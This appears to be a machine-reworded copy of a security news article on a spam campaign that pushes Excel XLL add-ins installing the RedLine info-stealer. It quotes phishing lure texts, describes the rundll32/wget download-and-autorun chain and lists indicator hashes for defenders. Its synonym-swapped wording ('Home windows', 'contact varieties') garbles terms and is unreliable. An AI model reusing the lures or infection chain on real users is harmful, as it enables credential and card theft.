[ad_1]
Cybercriminals are spamming web site contact varieties and dialogue boards to distribute Excel XLL information that obtain and set up the RedLine password and information-stealing malware.
RedLine is an information-stealing Trojan that steals cookies, consumer names and passwords, and bank cards saved in net browsers, in addition to FTP credentials and information from an contaminated system.
Along with stealing knowledge, RedLine can execute instructions, obtain and run additional malware, and create screenshots of the lively Home windows display screen.
All of this knowledge is collected and despatched again to the attackers to be offered on felony marketplaces or used for different malicious and fraudulent exercise.
Spamming contact varieties and dialogue boards
Over the previous two weeks, BleepingComputer’s contact varieties have been spammed quite a few occasions with totally different phishing lures, together with pretend promoting requests, vacation reward guides, and web site promotions.
After researching the lures, BleepingComputer has found this to be a widespread marketing campaign focusing on many web sites utilizing public boards or article remark methods.
In some phishing lures seen by BleepingComputer, the risk actors have created pretend web sites to host the malicious Excel XLL information used to put in the malware.
For instance, one marketing campaign used the next spam message and a pretend web site that imitated the reliable Plutio website.
The whole lot you want to run what you are promoting. Handle initiatives, create dazzling proposals and receives a commission sooner. Black Friday! All plans are FREE, no bank card required.
Pretend Plutio web site developed to push malicious XLL filesSource: BleepingComputer
Different spam messages faux to be fee stories, requests for promoting, or reward guides with hyperlinks to malicious XLL information hosted on Google Drive, as proven beneath.
Malicious XLL file hosted on Google DriveSource: BleepingComputer
Of specific curiosity is a lure focusing on website house owners with requests to promote on their website and asking them to evaluate the phrases of the provide. This results in a malicious ‘phrases.xll’ file that installs the malware.
Promote us promoting area in your website from $ 500 You possibly can learn our phrases on the hyperlink beneath https://drive.google[.]com/file/d/xxx/view?usp=sharing
Different lures seen by BleepingComputer this week are:
Thanks for utilizing our app. Your fee has been accepted. You possibly can see your fee report on the hyperlink beneath https://xxx[.]hyperlink/report.xll
Google simply revealed the 100 hottest items of 2021 I received $10.000. Need it too? Learn and settle for the phrases https://drive.google[.]com/file/d/xxx/view?usp=sharing
Abusing Excel XLL information
These spam campaigns are designed to push malicious Excel XLL information that obtain and set up the RedLine malware on victims’ Home windows gadgets.
An XLL file is an add-in that enables builders to increase the performance of Excel by studying and writing knowledge, importing knowledge from different sources, or creating customized features to carry out varied duties.
XLL information are merely a DLL file that features an ‘xlAutoOpen’ operate executed by Microsoft Excel when the add-in is opened.
Opening malicious add-in in ExcelSource: BleepingComputer
Whereas exams performed by BleepingComputer and safety researcher TheAnalyst, with who we mentioned the assault, should not accurately loading the XLL file, they might work in different variations of Microsoft Excel.
Nevertheless, manually executing the DLL with the regsvr32.exe command or the ‘rundll32 identify.xll, xlAutoOpen’ command will extract the wget.exe program to the %UserProfile% folder and use it to obtain the RedLine binary from a distant website.
XLL DLL downloading the RedLine malware utilizing wgetSource: BleepingComputer
This malicious binary is saved as %UserProfilepercentJavaBridge32.exe [VirusTotal] after which executed.
A Registry autorun entry will even be created to robotically launch the RedLine information-stealer each time victims log into Home windows.
RedLine autorun added to the Home windows RegistrySource: BleepingComputer
As soon as the malware is executed, it’ll seek for useful knowledge to steal, together with credentials and bank cards saved within the Chrome, Edge, Firefox, Courageous, and Opera browsers.
When you’ve got turn into a sufferer of this marketing campaign, it’s best to assume that your saved passwords are compromised and instantly change them. Moreover, in case you have bank cards saved in your browsers, it’s best to contact your bank card firm to alert them of the incident.
As XLL information are executables, risk actors can use them to carry out quite a lot of malicious conduct on a tool. Subsequently, you need to by no means open one except it comes from a trusted supply.
These information should not usually despatched as attachments however as a substitute put in via one other program or through your Home windows admin.
Subsequently, in the event you obtain an e mail or different message distributing these kinds of information, merely delete the message and report it as spam.
IOCs
XLL information:
phrases.xll, report.xll, terms_of_use.xll
f6c06615e35798274dfa9c4b28aaa6d94220804e766e9a70c4f0dab4779ee1db
RedLine:
JavaBridge32.exe: 626db53138176b8a371878ebaa2dbbd724be9a74f9f82ef9ebb7b7bfc0c6b2e9
[ad_2]